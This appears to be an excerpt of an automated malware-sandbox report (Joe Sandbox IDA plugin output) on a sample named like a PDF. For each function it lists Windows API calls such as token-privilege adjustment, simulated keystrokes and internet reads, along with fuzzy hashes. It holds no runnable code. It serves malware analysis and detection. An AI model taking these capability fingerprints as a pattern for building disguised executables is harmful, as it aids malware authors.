                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Find$File_wcscmp$CloseFirstNext
                                                    • String ID:
                                                    • API String ID: 2387731787-0
                                                    • Opcode ID: 8a225064de2162a2a65518aa4079735a89bef32f2b3f784d8071897eeb28b9b5
                                                    • Instruction ID: 1e5cfc3a5b6b76536c7fbb156b7366537efda2d994c73a91a5f63cc95b00db8c
                                                    • Opcode Fuzzy Hash: 8a225064de2162a2a65518aa4079735a89bef32f2b3f784d8071897eeb28b9b5
                                                    • Instruction Fuzzy Hash: CD41AD356043018FC71AEF28C491E9AB3E8FF4A324F10459DFA5A8B3A1DB31B944CB91
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                    • String ID:
                                                    • API String ID: 292994002-0
                                                    • Opcode ID: 2604368930a8db8a01bce76ebaf58a591b405e278971ea31eb301b6aa44bb506
                                                    • Instruction ID: 132bddfedb8d78186be859a1ec20cd631fe37b1a70cdf355c04560d71a2ac0ce
                                                    • Opcode Fuzzy Hash: 2604368930a8db8a01bce76ebaf58a591b405e278971ea31eb301b6aa44bb506
                                                    • Instruction Fuzzy Hash: 9511BC313002116FE7232F26DC84E6FBB9CEF86760F450429F84ADB291CF30E90286A4
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,0035E014,74DF0AE0,0035DEF1,003DDC38,?,?), ref: 0035E02C
                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0035E03E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                    • API String ID: 2574300362-192647395
                                                    • Opcode ID: 757597f7d477094613d61b0fff64616c5e2de454c28f06c489d66185673b5108
                                                    • Instruction ID: 9994c6dd4d99242e31d3ecf5f6f2bcd63bc45a70a96ce64d326666b9d595b48b
                                                    • Opcode Fuzzy Hash: 757597f7d477094613d61b0fff64616c5e2de454c28f06c489d66185673b5108
                                                    • Instruction Fuzzy Hash: 37D0A732800712DFC7374F61EC08E7376D8AB10301F2D4429F882D31A0D7B4D8848750
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Exception@8Throwstd::exception::exception
                                                    • String ID: @$ @$ @$ @
                                                    • API String ID: 3728558374-1793783390
                                                    • Opcode ID: 242b67ade364af05e99b7da00b41925a26dd2117e0b8b70efc69abe2101504af
                                                    • Instruction ID: 6205727fc5bacc2c2cb0dd2f2363677ac37c947122b027883deef174b72334d9
                                                    • Opcode Fuzzy Hash: 242b67ade364af05e99b7da00b41925a26dd2117e0b8b70efc69abe2101504af
                                                    • Instruction Fuzzy Hash: D372BC31E042089FCF16DF94C481EAEB7B5EF48345F15806AED09AF6A1D730AE49CB91
                                                    APIs
                                                      • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 0035B22F
                                                      • Part of subcall function 0035B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0035B5A5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Proc$LongWindow
                                                    • String ID:
                                                    • API String ID: 2749884682-0
                                                    • Opcode ID: b457d04d4561c5720f695212eb99c867cf91832c2f2d29306ad3c78df80dfd2a
                                                    • Instruction ID: feda2bfcc857351bb1baf153f799470235cbaaba1caa10447ac277056fd96716
                                                    • Opcode Fuzzy Hash: b457d04d4561c5720f695212eb99c867cf91832c2f2d29306ad3c78df80dfd2a
                                                    • Instruction Fuzzy Hash: 00A15B70114005BADB3B6F2E4C89EFFA95CEB4234AF11492DFD01EADB1CB259D099672
                                                    APIs
                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,003943BF,00000000), ref: 00394FA6
                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00394FD2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                    • String ID:
                                                    • API String ID: 599397726-0
                                                    • Opcode ID: 35b89d513804801de257d328f576835c11650694fed9dd463da815959761e9e8
                                                    • Instruction ID: 2dac383d3b9351cb3e78b6beaf96d6b865f354804ad279e64c166db48c920db1
                                                    • Opcode Fuzzy Hash: 35b89d513804801de257d328f576835c11650694fed9dd463da815959761e9e8
                                                    • Instruction Fuzzy Hash: 6541C77150460ABFEF239F94DC85EBFB7BCEB40754F10406EF606A6181EA719E4297A0
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: \Q?
                                                    • API String ID: 4104443479-2401325038
                                                    • Opcode ID: 19e902b013831c5e59991c6e0cdd56531c821848313b734a27f56b123a878649
                                                    • Instruction ID: bf73d9f3df542fe61645aefd980ab387fabbe47d01d33d5e22e670c72516b2d4
                                                    • Opcode Fuzzy Hash: 19e902b013831c5e59991c6e0cdd56531c821848313b734a27f56b123a878649
                                                    • Instruction Fuzzy Hash: 77A23B74904219CFCB26CF58C880BADBBF5FF49314F2681A9D859AB391D734AE81DB50
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0038E20D
                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0038E267
                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0038E2B4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DiskFreeSpace
                                                    • String ID:
                                                    • API String ID: 1682464887-0
                                                    • Opcode ID: 0c77b25283b4a09881800f8a4f709dde2665ad2da8dcac3d99c4923676c72652
                                                    • Instruction ID: 4e72fb554b14474ad5eb9f14ccf74022327f422870c28e8a56450e8d49c21976
                                                    • Opcode Fuzzy Hash: 0c77b25283b4a09881800f8a4f709dde2665ad2da8dcac3d99c4923676c72652
                                                    • Instruction Fuzzy Hash: B5213135A00218DFDB01EF95D885EAEBBB8FF49310F1484A9E946EB261DB31A905CB50
                                                    APIs
                                                      • Part of subcall function 0035F4EA: std::exception::exception.LIBCMT ref: 0035F51E
                                                      • Part of subcall function 0035F4EA: __CxxThrowException@8.LIBCMT ref: 0035F533
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0037B180
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0037B1AD
                                                    • GetLastError.KERNEL32 ref: 0037B1BA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                    • String ID:
                                                    • API String ID: 1922334811-0
                                                    • Opcode ID: 61afc98b980a17b0463f8987294feebf6b21ec8ac0cd2c1a024a1094a0181f76
                                                    • Instruction ID: 915be22b454caaad652f85f940d69bc3d82305f5284ae58f3120ccb501087e5a
                                                    • Opcode Fuzzy Hash: 61afc98b980a17b0463f8987294feebf6b21ec8ac0cd2c1a024a1094a0181f76
                                                    • Instruction Fuzzy Hash: 7F11CEB2400204AFE729AF68DCC5D2BB7BCFB44310B20852EF45A97650EB74FC418B60
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00386623
                                                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00386664
                                                    • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0038666F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                    • String ID:
                                                    • API String ID: 33631002-0
                                                    • Opcode ID: 71387ca21d166dadfdea43f067ead5183e5402f9835da6b2dca13255933bfa09
                                                    • Instruction ID: 6bcd5af943c2f1051fb885492bceec41bffbf3da9c407505268529f9e9ba61ab
                                                    • Opcode Fuzzy Hash: 71387ca21d166dadfdea43f067ead5183e5402f9835da6b2dca13255933bfa09
                                                    • Instruction Fuzzy Hash: 5C111E71E01228BFDB119FA5DC45FAEBBBCEB85B10F104166F900E6290D7B05A058BA5
                                                    APIs
                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00387223
                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0038723A
                                                    • FreeSid.ADVAPI32(?), ref: 0038724A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                    • String ID:
                                                    • API String ID: 3429775523-0
                                                    • Opcode ID: 88983a04af2fe873dc1c5521302bc129c35ef3b4e3f652a69a262d92abc7e284
                                                    • Instruction ID: c602cfd5944d227768445864c50f5a420866230c51cefedc715a79159464715c
                                                    • Opcode Fuzzy Hash: 88983a04af2fe873dc1c5521302bc129c35ef3b4e3f652a69a262d92abc7e284
                                                    • Instruction Fuzzy Hash: B3F0FF75904219BBDB05DBE8DD89EADBBBDEB08301F104469A502E2191E270A6458B10
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0038F599
                                                    • FindClose.KERNEL32(00000000), ref: 0038F5C9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Find$CloseFileFirst
                                                    • String ID:
                                                    • API String ID: 2295610775-0
                                                    • Opcode ID: e8f4ca8b6861a889efc4f3a958ba4ae11a6a1020045cac01f84bcedebd1e4ab1
                                                    • Instruction ID: 56523cf24332ba623d7e39eb746d448078d0be5b039f793157fa5ee936579fc5
                                                    • Opcode Fuzzy Hash: e8f4ca8b6861a889efc4f3a958ba4ae11a6a1020045cac01f84bcedebd1e4ab1
                                                    • Instruction Fuzzy Hash: 4D11C4316002009FD711EF28D845E2EB3E8FF85325F04896EF8A6DB2A1CB30BD048B85
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0039BE6A,?,?,00000000,?), ref: 0038CEA7
                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0039BE6A,?,?,00000000,?), ref: 0038CEB9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ErrorFormatLastMessage
                                                    • String ID:
                                                    • API String ID: 3479602957-0
                                                    • Opcode ID: 93715c6d84ec722e39eda056c8674c57f79af7a301dc4c85420b04c9f1871501
                                                    • Instruction ID: 021cc91f8f168a9e5d2b19295ddc77d7f934a49d3dfa845ce86ab3f3384621a8
                                                    • Opcode Fuzzy Hash: 93715c6d84ec722e39eda056c8674c57f79af7a301dc4c85420b04c9f1871501
                                                    • Instruction Fuzzy Hash: 0DF08235111329ABDB11ABA4DC49FEA776DBF08351F008165F915E6181D770AA40CBA0
                                                    APIs
                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00384153
                                                    • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00384166
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: InputSendkeybd_event
                                                    • String ID:
                                                    • API String ID: 3536248340-0
                                                    • Opcode ID: 5321757cbb26d9fa35bacfcfe7a224c65cbbd9759f5b3c53d7db9180e870c366
                                                    • Instruction ID: 47ed2347eaffa4f778c14809b24d0e738507f819d67f3c4c6adb6ba6e25a6bce
                                                    • Opcode Fuzzy Hash: 5321757cbb26d9fa35bacfcfe7a224c65cbbd9759f5b3c53d7db9180e870c366
                                                    • Instruction Fuzzy Hash: B7F06D7090034EAFDB069FA0C809BBE7BB4EF00305F008059F96596191D77996129FA0
                                                    APIs
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0037ACC0), ref: 0037AB99
                                                    • CloseHandle.KERNEL32(?,?,0037ACC0), ref: 0037ABAB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                    • String ID:
                                                    • API String ID: 81990902-0
                                                    • Opcode ID: 48c6f1a0e2dbb0c1267d652847b77098c4d7d5f7a973791ccb2ad18cfe828b6b
                                                    • Instruction ID: 17cf7a4dbe3ab899857ab988496a5320d1a9bc942a3710a498397d28fc72923e
                                                    • Opcode Fuzzy Hash: 48c6f1a0e2dbb0c1267d652847b77098c4d7d5f7a973791ccb2ad18cfe828b6b
                                                    • Instruction Fuzzy Hash: C0E0B676000610AFE7262F64EC09D76BBADEB44321B208839B89A85870DB62AC949B50
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00366DB3,-0000031A,?,?,00000001), ref: 003681B1
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 003681BA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: bf07bd30d489025e2ded1912705f8d9907c2083fa0641f8f7df2c8e97304e743
                                                    • Instruction ID: 969d538149f7b068e648568b120c08fa81f8ed6d7fec25e94e71d5536edabd24
                                                    • Opcode Fuzzy Hash: bf07bd30d489025e2ded1912705f8d9907c2083fa0641f8f7df2c8e97304e743
                                                    • Instruction Fuzzy Hash: FDB09236044648ABDB022BA1EC09F587F6CEB48752F014021F60D840618B7264108B92
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 17238fdfae74eda5e377931ce01843d7014da8985009bb3bba4c71b9e395c76f
                                                    • Instruction ID: 7d2041339b6130ab46d2423a81a97b2798cc00367e6a4459970336bc890d7014
                                                    • Opcode Fuzzy Hash: 17238fdfae74eda5e377931ce01843d7014da8985009bb3bba4c71b9e395c76f
                                                    • Instruction Fuzzy Hash: B4321422E29F414DD7239635D822336A39DAFB73D4F15D737E819B5DAAEB28C4835100
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: __itow__swprintf
                                                    • String ID:
                                                    • API String ID: 674341424-0
                                                    • Opcode ID: 504b5a9cb68ec52cd10f507726a7f7be52ddcd04c5a6db324b18da63a798f282
                                                    • Instruction ID: bb636cf8f8b344cc7ec53c03fe010a45280503ee05f977fad47a70eaf7e128e2
                                                    • Opcode Fuzzy Hash: 504b5a9cb68ec52cd10f507726a7f7be52ddcd04c5a6db324b18da63a798f282
                                                    • Instruction Fuzzy Hash: 2A2298716183009FD726DF14C891BAFB7E8AF84314F11491EF99A9F2A1DB71E944CB82
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 766f83fbc61e1e641ac8a7d15449ea379c4f4bcfa2ff3e4fdc5b41657403f5e0
                                                    • Instruction ID: 99396e674043f32e5a52ed04dfa88bcd8956d7f5e39e697d5ca90434039069c0
                                                    • Opcode Fuzzy Hash: 766f83fbc61e1e641ac8a7d15449ea379c4f4bcfa2ff3e4fdc5b41657403f5e0
                                                    • Instruction Fuzzy Hash: ECB1CF20D2AF414DD62396399871336B75CAFBB3D6F92D71BFC2A74D62EB2185834180
                                                    APIs
                                                    • __time64.LIBCMT ref: 0038B6DF
